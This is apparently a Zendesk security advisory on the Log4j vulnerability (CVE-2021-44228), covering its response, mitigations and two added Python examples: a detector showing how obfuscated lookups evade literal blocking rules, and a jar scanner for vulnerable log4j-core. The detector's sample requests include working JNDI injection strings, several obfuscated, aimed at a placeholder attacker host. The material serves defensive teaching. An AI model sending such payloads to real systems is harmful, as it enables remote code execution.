This security advisory provides customers with an update on how Zendesk services are affected by the Apache Log4j vulnerability (CVE-2021-44228). This vulnerability has been referred to as Log4Shell by some outlets.
Status update on December 23, 2021: Zendesk has mitigated known instances of this vulnerability in our product environment.
What is this vulnerability?
A Remote Code Execution (RCE) vulnerability was discovered in Log4j, the widely used Java logging library. Affected versions (Log4j 2.0-beta9 through 2.14.1) evaluate lookup expressions such as ${jndi:ldap://...} inside logged messages, so an unauthenticated adversary who can get a crafted string into any logged field (for example an HTTP header, a username or a search query) can cause the application to fetch and execute attacker-controlled code. This industry-wide vulnerability is serious and affects many software products and online services.
How does this vulnerability affect Zendesk?
Zendesk uses Apache Log4j in its products. This vulnerability was publicly disclosed on Thursday, December 9, 2021. We have mitigated known instances of this vulnerability and continue to actively monitor this issue.
In response, we activated our incident response process and immediately investigated the use of Log4j across Zendesk products. As a result:
- We identified and triaged all Log4j deployments in all our products, and implemented the vendor-provided update or recommended mitigations to our systems.
- We have worked, and will continue to work as new information arises, with our sub-processors and critical vendors to ensure they remediate any vulnerabilities in the environments we rely on.
We have also deployed rules that block known exploitation patterns. These rules are a secondary, defense-in-depth control only: pattern-based blocking is not 100% effective, because Log4j's lookup syntax lets an attacker rewrite the ${jndi:...} payload in forms a literal match does not see, so patching and removing the vulnerable code path remain the primary mitigation.
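As an added illustration of why pattern-based blocking is only a secondary control (this is example code, not Zendesk's own rules): Log4j resolves nested lookups inside-out, so `${jndi:...}` can be spelled with `${lower:...}`, `${upper:...}`, `${date:'...'}` or default-value (`${x:-y}`) lookups and still evaluate to the same payload. The script compares a literal-string rule against a check that first collapses those lookups approximately the way a vulnerable Log4j would. The request lines are constructed samples with a placeholder hostname, and the resolver covers only the common rewriting tricks; it is not a reimplementation of Log4j.

```python
import re

# Innermost ${...} (no nested braces inside), which is what Log4j resolves first.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# The dangerous lookup itself, once obfuscation has been peeled away.
_JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Approximate Log4j 2 (< 2.15) evaluation of one non-JNDI lookup body."""
    if ":-" in body:                       # ${name:-default} -> default; ${::-j} -> "j"
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "date":                   # ${date:'j'} -> "j" (quoted literal in a date pattern)
        return arg.replace("'", "")
    return ""                              # env/sys/ctx/...: value unknown offline, treat as empty


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups inside-out, leaving any ${jndi:...} in place."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            body = m.group(1)
            if body.lstrip().lower().startswith("jndi:"):
                return m.group(0)          # keep the payload visible for detection
            changed = True
            return _resolve(body)

        text = _INNER.sub(repl, text)
        if not changed:
            break
    return text


def naive_match(text: str) -> bool:
    """What a literal-string blocking rule sees."""
    return "${jndi:" in text.lower()


def is_log4shell(text: str) -> bool:
    """Detection after normalization: catches the obfuscated forms too."""
    return _JNDI.search(normalize(text)) is not None


# Constructed sample request lines; attacker.example is a placeholder hostname.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1 User-Agent: Mozilla/5.0",
    "GET / HTTP/1.1 User-Agent: ${jndi:ldap://attacker.example/a}",
    "GET / HTTP/1.1 User-Agent: ${${lower:j}ndi:ldap://attacker.example/a}",
    "GET / HTTP/1.1 User-Agent: ${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}",
    "GET / HTTP/1.1 User-Agent: ${${env:NOPE:-j}ndi:${lower:LDAP}://attacker.example/a}",
    "GET / HTTP/1.1 User-Agent: ${${date:'j'}${upper:n}di:dns://attacker.example/a}",
    "GET /search?q=${date:yyyy} HTTP/1.1",
]


def compare(lines=SAMPLE_REQUESTS) -> list:
    """(line, literal-rule verdict, normalized verdict) for each sample."""
    return [(line, naive_match(line), is_log4shell(line)) for line in lines]


if __name__ == "__main__":
    for line, literal, normalized in compare():
        print(f"literal={literal!s:5} normalized={normalized!s:5}  {line}")
```

Only the second sample is caught by the literal rule; the four obfuscated variants reach the logger looking harmless and only reveal `${jndi:` after resolution, which is exactly what happens inside a vulnerable Log4j. A blocking rule can chase each new encoding, but it cannot see the resolved value, which is why the page treats such rules as secondary to patching.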
At this point, our investigation of Log4j use across our products is complete, and our security teams continue to track security issues involving Log4j as part of our regular security monitoring and patch management process.
Did Zendesk investigate CVE-2021-45046 and CVE-2021-45105?
As part of our response, we also investigated CVE-2021-45046 and CVE-2021-45105 in Log4j. We performed a risk assessment and took action where they exposed significant risk. Of note, both issues require a non-default configuration in which the logging pattern layout itself contains a Context Lookup (for example $${ctx:loginId}): CVE-2021-45046 is the incomplete fix in Log4j 2.15.0, initially rated as denial of service and later reassessed as allowing information leakage and, in some environments, remote code execution, and CVE-2021-45105 is a Denial of Service vulnerability only (uncontrolled recursion in lookup evaluation). Neither affects most configurations.
What actions should I take?
- Users of Zendesk services do not need to take any action at this time.
- Users of custom products developed under Professional Services agreements are typically responsible for their own security updates; they should review their agreement as appropriate and verify whether those products use the Log4j component.
We also strongly recommend customers evaluate their own use of the Apache log4j logging library in conjunction with our products in any custom apps or integrations you may have developed or deployed.
If use of a vulnerable version is identified, we strongly recommend upgrading to the fixed release provided by the Apache Software Foundation for your Java version. Where an immediate upgrade is not possible, apply the vendor-recommended mitigation of removing the JndiLookup class from the log4j-core jar (org/apache/logging/log4j/core/lookup/JndiLookup.class); note that setting the log4j2.formatMsgNoLookups property on its own was found to be insufficient (see CVE-2021-45046).
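To make the "validate use of the Log4j component" step concrete, here is an added example (not Zendesk's or the ASF's tooling) of an offline scanner for the kind of custom app or integration the page refers to. It walks a directory, opens every jar/war/ear, reads the log4j-core version from the Maven pom.properties the library ships with, checks whether JndiLookup.class is still present, and recurses into nested archives, since fat jars and wars embed log4j-core rather than exposing it on disk. The status is relative to CVE-2021-44228 only (first fixed in 2.15.0, with 2.12.2 and 2.3.1 as the Java 7 and Java 6 backports); later releases addressed the follow-on CVEs, so "fixed" here means "not exposed to the original RCE", not "fully current". The sample archive tree is constructed in a temporary directory with placeholder bytes in place of real class files.

```python
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Optional

# The class behind CVE-2021-44228; the ASF mitigation for unpatchable 2.x jars is to delete it.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata that log4j-core ships with; carries the exact version string.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

# First releases fixing CVE-2021-44228, by branch (2.15.0 mainline; 2.12.2 Java 7; 2.3.1 Java 6).
FIX_44228 = {(2, 3): (2, 3, 1), (2, 12): (2, 12, 2)}
FIX_44228_DEFAULT = (2, 15, 0)


@dataclass
class Finding:
    location: str              # file path, with "!/" joining nested archive members
    version: Optional[str]
    jndi_lookup_present: bool
    status: str                # fixed | vulnerable | mitigated-class-removed | unknown-version


def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9). Good enough for range checks."""
    nums = [int(n) for n in re.findall(r"\d+", text)]
    return tuple(nums + [0] * (3 - len(nums)))[:3]


def classify(version: Optional[str], jndi_present: bool) -> str:
    if version is None:
        return "unknown-version"
    v = parse_version(version)
    if v >= FIX_44228.get(v[:2], FIX_44228_DEFAULT):
        return "fixed"
    return "vulnerable" if jndi_present else "mitigated-class-removed"


def _scan_zip(zf: zipfile.ZipFile, location: str, depth: int, out: list) -> None:
    names = set(zf.namelist())
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    jndi = JNDI_LOOKUP_CLASS in names
    if version is not None or jndi:
        out.append(Finding(location, version, jndi, classify(version, jndi)))
    if depth == 0:
        return
    # Fat jars and wars embed log4j-core as a nested archive; recurse in memory.
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            _scan_zip(inner, f"{location}!/{name}", depth - 1, out)


def scan_path(root: str, max_depth: int = 3) -> list:
    findings: list = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if not f.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, f)
            try:
                with zipfile.ZipFile(path) as zf:
                    _scan_zip(zf, path, max_depth, findings)
            except zipfile.BadZipFile:
                continue
    return findings


def _make_jar(target, version: Optional[str], with_jndi: bool, extra: Optional[dict] = None) -> None:
    """Write a constructed jar (path or file-like); class bytes are placeholders, not bytecode."""
    with zipfile.ZipFile(target, "w") as zf:
        if version:
            zf.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
        for name, data in (extra or {}).items():
            zf.writestr(name, data)


def build_fixture(root: str) -> None:
    """Constructed sample tree: unpatched, class-removed, upgraded-inside-a-war, unrelated."""
    _make_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1", True)
    _make_jar(os.path.join(root, "log4j-core-2.14.1-hotfixed.jar"), "2.14.1", False)
    _make_jar(os.path.join(root, "unrelated-lib.jar"), None, False, {"com/example/App.class": b"\x00"})
    inner = io.BytesIO()
    _make_jar(inner, "2.17.1", True)
    _make_jar(os.path.join(root, "app.war"), None, False,
              {"WEB-INF/lib/log4j-core-2.17.1.jar": inner.getvalue()})


def demo() -> dict:
    """Scan the constructed tree and map each location (relative to root) to its status."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return {os.path.relpath(f.location, root): f.status for f in scan_path(root)}


if __name__ == "__main__":
    for location, status in sorted(demo().items()):
        print(f"{status:24} {location}")
```

The scan reports the unpatched 2.14.1 jar as vulnerable, the copy with JndiLookup.class deleted as mitigated, and the 2.17.1 jar nested inside app.war as fixed; the unrelated jar produces no finding. Run it against a real deployment by calling scan_path on the application's lib directory; a "vulnerable" result with a version you believed was patched usually means a second, shaded copy of log4j-core inside a fat jar.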
Where can I find more information?
Additional information on this vulnerability can be found here:
- Apache Software Foundation: Apache Log4j Security Vulnerabilities (https://logging.apache.org/log4j/2.x/security.html)
- National Vulnerability Database: CVE-2021-44228 (https://nvd.nist.gov/vuln/detail/CVE-2021-44228)